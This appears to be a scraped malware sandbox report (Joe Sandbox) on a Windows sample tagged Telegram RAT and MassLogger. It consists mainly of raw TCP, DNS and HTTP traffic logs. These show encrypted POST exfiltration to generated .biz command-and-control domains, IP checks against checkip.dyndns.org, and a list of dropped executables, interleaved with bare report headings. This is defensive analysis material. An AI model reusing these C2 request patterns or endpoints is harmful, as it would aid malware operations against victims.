Jan 10, 2025 21:41:36.191823006 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:36.191847086 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:36.191894054 CET	49719	80	192.168.2.11	13.248.148.254
Jan 10, 2025 21:41:36.191922903 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:36.191970110 CET	49719	80	192.168.2.11	13.248.148.254
Jan 10, 2025 21:41:36.192008972 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:36.192022085 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:36.192034006 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:36.192048073 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:36.192118883 CET	49719	80	192.168.2.11	13.248.148.254
Jan 10, 2025 21:41:36.398118973 CET	49720	80	192.168.2.11	18.141.10.107
Jan 10, 2025 21:41:36.402904034 CET	80	49720	18.141.10.107	192.168.2.11
Jan 10, 2025 21:41:36.402982950 CET	49720	80	192.168.2.11	18.141.10.107
Jan 10, 2025 21:41:36.403197050 CET	49720	80	192.168.2.11	18.141.10.107
Jan 10, 2025 21:41:36.403213978 CET	49720	80	192.168.2.11	18.141.10.107
Jan 10, 2025 21:41:36.408027887 CET	80	49720	18.141.10.107	192.168.2.11
Jan 10, 2025 21:41:36.408039093 CET	80	49720	18.141.10.107	192.168.2.11
Jan 10, 2025 21:41:37.676655054 CET	49720	80	192.168.2.11	18.141.10.107
Jan 10, 2025 21:41:37.698838949 CET	49721	80	192.168.2.11	18.141.10.107
Jan 10, 2025 21:41:37.703717947 CET	80	49721	18.141.10.107	192.168.2.11
Jan 10, 2025 21:41:37.703838110 CET	49721	80	192.168.2.11	18.141.10.107
Jan 10, 2025 21:41:37.704047918 CET	49721	80	192.168.2.11	18.141.10.107
Jan 10, 2025 21:41:37.704093933 CET	49721	80	192.168.2.11	18.141.10.107
Jan 10, 2025 21:41:37.708864927 CET	80	49721	18.141.10.107	192.168.2.11
Jan 10, 2025 21:41:37.708878994 CET	80	49721	18.141.10.107	192.168.2.11
Jan 10, 2025 21:41:39.103491068 CET	80	49721	18.141.10.107	192.168.2.11
Jan 10, 2025 21:41:39.103564978 CET	80	49721	18.141.10.107	192.168.2.11
Jan 10, 2025 21:41:39.103652954 CET	49721	80	192.168.2.11	18.141.10.107
Jan 10, 2025 21:41:39.103831053 CET	49721	80	192.168.2.11	18.141.10.107
Jan 10, 2025 21:41:39.108658075 CET	80	49721	18.141.10.107	192.168.2.11
Jan 10, 2025 21:41:39.452225924 CET	49722	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:41:39.457123995 CET	80	49722	82.112.184.197	192.168.2.11
Jan 10, 2025 21:41:39.457221031 CET	49722	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:41:39.457382917 CET	49722	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:41:39.457396984 CET	49722	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:41:39.462189913 CET	80	49722	82.112.184.197	192.168.2.11
Jan 10, 2025 21:41:39.462238073 CET	80	49722	82.112.184.197	192.168.2.11
Jan 10, 2025 21:42:00.831207991 CET	80	49722	82.112.184.197	192.168.2.11
Jan 10, 2025 21:42:00.831280947 CET	49722	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:42:00.831577063 CET	49722	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:42:00.836369991 CET	80	49722	82.112.184.197	192.168.2.11
Jan 10, 2025 21:42:01.282387018 CET	49813	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:42:01.287236929 CET	80	49813	82.112.184.197	192.168.2.11
Jan 10, 2025 21:42:01.287329912 CET	49813	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:42:01.433628082 CET	49813	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:42:01.433671951 CET	49813	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:42:01.438512087 CET	80	49813	82.112.184.197	192.168.2.11
Jan 10, 2025 21:42:01.438525915 CET	80	49813	82.112.184.197	192.168.2.11
Jan 10, 2025 21:42:07.493652105 CET	80	49705	158.101.44.242	192.168.2.11
Jan 10, 2025 21:42:07.493720055 CET	49705	80	192.168.2.11	158.101.44.242
Jan 10, 2025 21:42:22.641138077 CET	80	49813	82.112.184.197	192.168.2.11
Jan 10, 2025 21:42:22.641222954 CET	49813	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:42:22.641602039 CET	49813	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:42:22.646352053 CET	80	49813	82.112.184.197	192.168.2.11
Jan 10, 2025 21:42:22.769795895 CET	49942	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:42:22.774629116 CET	80	49942	82.112.184.197	192.168.2.11
Jan 10, 2025 21:42:22.777445078 CET	49942	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:42:22.777595997 CET	49942	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:42:22.777622938 CET	49942	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:42:22.782414913 CET	80	49942	82.112.184.197	192.168.2.11
Jan 10, 2025 21:42:22.782433987 CET	80	49942	82.112.184.197	192.168.2.11
Jan 10, 2025 21:42:32.790792942 CET	49718	80	192.168.2.11	72.52.178.23
Jan 10, 2025 21:42:32.790879965 CET	49719	80	192.168.2.11	13.248.148.254
Jan 10, 2025 21:42:32.795933962 CET	80	49718	72.52.178.23	192.168.2.11
Jan 10, 2025 21:42:32.796066999 CET	49718	80	192.168.2.11	72.52.178.23
Jan 10, 2025 21:42:32.796242952 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:42:32.796293020 CET	49719	80	192.168.2.11	13.248.148.254
Jan 10, 2025 21:42:35.895804882 CET	49705	80	192.168.2.11	158.101.44.242
Jan 10, 2025 21:42:35.900638103 CET	80	49705	158.101.44.242	192.168.2.11
Jan 10, 2025 21:42:44.144510984 CET	80	49942	82.112.184.197	192.168.2.11
Jan 10, 2025 21:42:44.144717932 CET	49942	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:42:44.684739113 CET	49942	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:42:44.689573050 CET	80	49942	82.112.184.197	192.168.2.11
Jan 10, 2025 21:42:44.885756016 CET	49990	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:42:44.890613079 CET	80	49990	82.112.184.197	192.168.2.11
Jan 10, 2025 21:42:44.890714884 CET	49990	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:42:44.891060114 CET	49990	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:42:44.891087055 CET	49990	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:42:44.895899057 CET	80	49990	82.112.184.197	192.168.2.11
Jan 10, 2025 21:42:44.895910025 CET	80	49990	82.112.184.197	192.168.2.11
Jan 10, 2025 21:43:06.271750927 CET	80	49990	82.112.184.197	192.168.2.11
Jan 10, 2025 21:43:06.271833897 CET	49990	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:43:06.271892071 CET	49990	80	192.168.2.11	82.112.184.197
Jan 10, 2025 21:43:06.276632071 CET	80	49990	82.112.184.197	192.168.2.11

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 21:40:41.120148897 CET	56888	53	192.168.2.11	1.1.1.1
Jan 10, 2025 21:40:41.127829075 CET	53	56888	1.1.1.1	192.168.2.11
Jan 10, 2025 21:40:41.489829063 CET	61335	53	192.168.2.11	1.1.1.1
Jan 10, 2025 21:40:41.497086048 CET	53	61335	1.1.1.1	192.168.2.11
Jan 10, 2025 21:40:50.145417929 CET	57044	53	192.168.2.11	1.1.1.1
Jan 10, 2025 21:40:50.152275085 CET	53	57044	1.1.1.1	192.168.2.11
Jan 10, 2025 21:40:55.161128998 CET	63263	53	192.168.2.11	1.1.1.1
Jan 10, 2025 21:40:55.168055058 CET	53	63263	1.1.1.1	192.168.2.11
Jan 10, 2025 21:41:02.592142105 CET	50848	53	192.168.2.11	1.1.1.1
Jan 10, 2025 21:41:02.599420071 CET	53	50848	1.1.1.1	192.168.2.11
Jan 10, 2025 21:41:05.701571941 CET	54487	53	192.168.2.11	1.1.1.1
Jan 10, 2025 21:41:05.709022045 CET	53	54487	1.1.1.1	192.168.2.11
Jan 10, 2025 21:41:07.478125095 CET	60849	53	192.168.2.11	1.1.1.1
Jan 10, 2025 21:41:07.485328913 CET	53	60849	1.1.1.1	192.168.2.11
Jan 10, 2025 21:41:33.710638046 CET	58354	53	192.168.2.11	1.1.1.1
Jan 10, 2025 21:41:33.717946053 CET	53	58354	1.1.1.1	192.168.2.11
Jan 10, 2025 21:41:34.264251947 CET	58700	53	192.168.2.11	1.1.1.1
Jan 10, 2025 21:41:34.271455050 CET	53	58700	1.1.1.1	192.168.2.11
Jan 10, 2025 21:41:34.883013964 CET	57266	53	192.168.2.11	1.1.1.1
Jan 10, 2025 21:41:34.890124083 CET	53	57266	1.1.1.1	192.168.2.11
Jan 10, 2025 21:41:36.313915014 CET	60553	53	192.168.2.11	1.1.1.1
Jan 10, 2025 21:41:36.323036909 CET	53	60553	1.1.1.1	192.168.2.11
Jan 10, 2025 21:41:36.323846102 CET	55887	53	192.168.2.11	1.1.1.1
Jan 10, 2025 21:41:36.331206083 CET	53	55887	1.1.1.1	192.168.2.11
Jan 10, 2025 21:41:39.157152891 CET	59297	53	192.168.2.11	1.1.1.1
Jan 10, 2025 21:41:39.164943933 CET	53	59297	1.1.1.1	192.168.2.11
Jan 10, 2025 21:41:39.167581081 CET	57059	53	192.168.2.11	1.1.1.1
Jan 10, 2025 21:41:39.175019026 CET	53	57059	1.1.1.1	192.168.2.11
Jan 10, 2025 21:41:39.175864935 CET	58003	53	192.168.2.11	1.1.1.1
Jan 10, 2025 21:41:39.386456013 CET	53	58003	1.1.1.1	192.168.2.11
Jan 10, 2025 21:42:22.642429113 CET	57909	53	192.168.2.11	1.1.1.1
Jan 10, 2025 21:42:22.729996920 CET	53	57909	1.1.1.1	192.168.2.11
Jan 10, 2025 21:43:06.272766113 CET	58000	53	192.168.2.11	1.1.1.1
Jan 10, 2025 21:43:06.281081915 CET	53	58000	1.1.1.1	192.168.2.11

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:40:42.798125029 CET	351	OUT	POST /uljtmx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Jan 10, 2025 21:40:42.798156977 CET	850	OUT	Data Raw: c8 da 14 83 92 3b f4 21 46 03 00 00 7d 4b 99 f3 d4 29 bb b9 7d cb 9c 6f 75 b0 a3 bd 2d 0f 80 8e cf a1 0e ea 90 49 93 8b b9 f1 e6 c5 11 c9 f0 c2 7f c1 8f e9 09 9c c2 f3 f2 be a2 e8 09 35 3f 36 d6 cc fb ce 44 94 6e 4e d3 4a 1b d4 0b f3 cd 79 5b fc Data Ascii: ;!F}K)}ou-I5?6DnNJy[L4:1;-C4G-^l)oEu?Ej8nSh~8xKU_6fkE(#qc0m+xzOXEV!>CWv\|~\|c1@(6!Mx2.x,XEi

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:40:43.164129019 CET	359	OUT	POST /lfsgndokapxyhw HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 800
Jan 10, 2025 21:40:43.164148092 CET	800	OUT	Data Raw: 87 6c bd fe 0e 0f 6c 6a 14 03 00 00 7c c6 e8 17 98 3c 91 a8 42 51 28 fe a9 d6 29 c0 43 97 37 55 25 20 49 a3 ba 69 49 24 99 98 e4 cc c7 ec b1 fd 17 5d 5f 28 aa 64 ed 40 8c 11 1f 44 0a e9 51 ad 25 5b 82 96 5b 9a 99 26 13 7f 0f 12 aa 15 97 c4 a7 c2 Data Ascii: llj\|<BQ()C7U% IiI$]_(d@DQ%[[&e;A9.{7&><s\'}G?bKeZ\|DEc@^}f8P\|Yv~6SZUO?ujpN^-Z~eE;J [\<3Pff,sfOaafQ

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:40:50.177288055 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:40:53.560585022 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:40:53 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: accd065f7e6d8028b53fbaf46b5a1404 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 21:40:53.565746069 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 21:40:55.112729073 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:40:55 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 63b1a94b8980b7bb46fa6e332a7c657c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 21:41:01.080146074 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 21:41:02.493897915 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:41:02 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a887b4f3be6a8f421ec066e32f121c42 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:41:04.163836002 CET	352	OUT	POST /illjjcn HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Jan 10, 2025 21:41:04.163865089 CET	850	OUT	Data Raw: 66 72 08 48 ef 78 51 96 46 03 00 00 30 5c a2 b0 70 3f 64 20 8a 68 c3 b5 e7 73 f4 8b 0f b7 5c 9a 51 53 24 ca f6 7d 18 8d 09 ec 95 17 bb 35 e3 f0 05 da c8 23 db d7 2f f1 f2 fd bf c7 84 81 f4 55 69 ee 1f 46 d6 ae df d2 4b c2 1c 0f b1 a0 4c 0b 82 f9 Data Ascii: frHxQF0\p?d hs\QS$}5#/UiFKLaOc!.}!CU`vPE.f@$fP}NsROL ecf+Q)itd?j%=>x#IMt!H'glgZ+7~w3?}baG*

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:41:05.818629026 CET	358	OUT	POST /dawajiqtqrkbbpd HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Jan 10, 2025 21:41:05.818687916 CET	850	OUT	Data Raw: 19 05 d6 96 eb 9f 16 eb 46 03 00 00 2c 2b a9 42 c2 22 3f b1 8e 3c bf 51 c3 e9 ef 88 b2 75 b4 86 91 24 52 9a c9 29 e0 48 cd 68 ca 43 d2 69 3d 4a a8 ef 42 a6 9d 77 84 e8 fb 09 5c 2d cc 98 3b 2d 11 bd e1 ba a3 b8 df 8b c5 bd 37 49 b0 48 ac 88 f3 05 Data Ascii: F,+B"?<Qu$R)HhCi=JBw\-;-7IH>AhxF___YA=- GR}m,-x[>nP-!iTo{FDU^;jQXw8d0Vmq}.?Sb6gfk2o=
Jan 10, 2025 21:41:07.190619946 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 20:41:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=418f96d941fb2e58445cb597d7422998\|8.46.123.189\|1736541666\|1736541666\|0\|1\|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:41:08.440536976 CET	352	OUT	POST /xifbrctmnvq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Jan 10, 2025 21:41:08.440536976 CET	850	OUT	Data Raw: e1 93 be 6b 09 ac fe 45 46 03 00 00 b6 c5 b3 cb 9d 3b 98 2a 70 35 69 13 14 17 b2 12 56 32 bb f1 4f 4b 8c 05 92 30 c6 4f e7 4e 42 30 1c a1 75 a4 2e 8f 8a ad e0 75 42 3b f1 0a bb 98 2a f1 4c db 6a 93 69 8d b1 03 01 28 2e 34 e2 ea 47 5d ee e0 af 4a Data Ascii: kEF;p5iV2OK0ONB0u.uB;Lji(.4G]J&an82a#1S4g]075E9T=FMGY"dhWwcUt}\mMTS4k=GY?(TG}yV_yFo2'jE,Mm\|-~~b;

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:41:29.911083937 CET	346	OUT	POST /kmpia HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Jan 10, 2025 21:41:29.911083937 CET	850	OUT	Data Raw: be 34 c7 de 17 20 59 64 46 03 00 00 e4 dc 1c 61 2a 2e ad 30 7f b6 6d 2f d4 ce a5 f0 8c 96 79 43 bd 25 ce 8b 85 77 4b e0 30 62 1d 54 03 a8 9e d2 5f 8c 6f 92 76 3c 7f 3f 22 5e a8 d3 68 c3 ac b8 d7 7f 6f 95 23 58 b5 5c 44 a1 93 3f fa 24 15 4b 84 c3 Data Ascii: 4 YdFa*.0m/yC%wK0bT_ov<?"^ho#X\D?$K!vtv?2=g!cVvCUdN2 sKN\|W .raWI/b{Y%j`R[Jt4Wt NjJpf)l]X4Qz

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:41:33.747525930 CET	355	OUT	POST /brsjohajbqj HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: npukfztj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Jan 10, 2025 21:41:33.747538090 CET	850	OUT	Data Raw: 43 6f 92 64 ae 3d 3e 5d 46 03 00 00 eb f8 2f c5 1f b8 c7 a4 0b 7a f5 0e 4f 2d e4 24 98 c2 5c 04 66 df 05 6f b0 f3 5d 3c a5 e3 f5 b0 30 0a 39 76 22 fc f0 ef cf 41 e8 b2 4a d5 86 46 ee 31 4c d3 2e 41 a5 89 98 3d 14 26 21 2e 71 bc 20 23 db 0c 2d db Data Ascii: Cod=>]F/zO-$\fo]<09v"AJF1L.A=&!.q #-O@+rDW'SLFTm3}M/Crc>~{c!BFvIHww_2U#323u@zZRUwn@T%,JFDTn*ydi5"
Jan 10, 2025 21:41:34.224201918 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 20:41:34 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a57023cf597cd789b57f780e137dda90\|8.46.123.189\|1736541694\|1736541694\|0\|1\|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:41:34.321671009 CET	348	OUT	POST /yjxln HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Jan 10, 2025 21:41:34.321671009 CET	850	OUT	Data Raw: ba f3 5f c2 d4 5e 2d 6e 46 03 00 00 13 f2 67 b7 d3 f6 e6 e9 b4 21 8e 81 4a b4 f6 86 83 dc fd 37 d2 47 53 5a d4 49 8d 15 d8 da fd 93 e6 3b 2f 63 06 70 0f a5 b1 6a 91 01 8b 7c 12 85 15 8f 9e 61 92 82 f1 68 a3 fd 28 5a 25 93 fd f8 86 80 51 ce 8a 2a Data Ascii: _^-nFg!J7GSZI;/cpj\|ah(Z%Qn$A{JI_V6MT7TsAotj_UwX^AG(S(~~,h,xX2_[iD.N!WVa+1xT,0kE8C=WL{}*
Jan 10, 2025 21:41:34.876637936 CET	280	IN	HTTP/1.1 302 Moved Temporarily Date: Fri, 10 Jan 2025 20:41:34 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Location: http://ww12.przvgke.biz/yjxln?usid=27&utid=10450772446 Cache-Control: no-cache Pragma: no-cache Access-Control-Allow-Origin: *
Jan 10, 2025 21:41:35.740994930 CET	349	OUT	POST /sbjeah HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Jan 10, 2025 21:41:35.741106987 CET	850	OUT	Data Raw: 5a 2e 5b c6 e0 ef 5e 2b 46 03 00 00 02 e6 ec ce 21 e1 93 4e fe 32 94 83 16 53 ff b6 61 fc e5 e9 fa 58 f2 2d 37 e4 34 9c e3 88 cb 22 25 5c 82 19 10 3a 85 91 8a ef 85 99 96 12 b0 17 dd ba 53 36 ff 79 71 52 eb fa 91 bc be 5b 69 b0 0f 6f 35 95 bb 98 Data Ascii: Z.[^+F!N2SaX-74"%\:S6yqR[io54n6&`i54z^D0z/)H:Ss<ziSHso6aB~iNl\qsf4`FvV(+OJv$y_%c;zKI(UVH2bU
Jan 10, 2025 21:41:35.889214993 CET	281	IN	HTTP/1.1 302 Moved Temporarily Date: Fri, 10 Jan 2025 20:41:35 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Location: http://ww12.przvgke.biz/sbjeah?usid=27&utid=10450772717 Cache-Control: no-cache Pragma: no-cache Access-Control-Allow-Origin: *

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SABXJ1B5c8.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: MassLogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Au3Check.exe

C:\Program Files (x86)\AutoIt3\Au3Info.exe

C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

Windows Analysis Report
SABXJ1B5c8.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:41:34.899106026 CET	356	OUT	GET /yjxln?usid=27&utid=10450772446 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww12.przvgke.biz
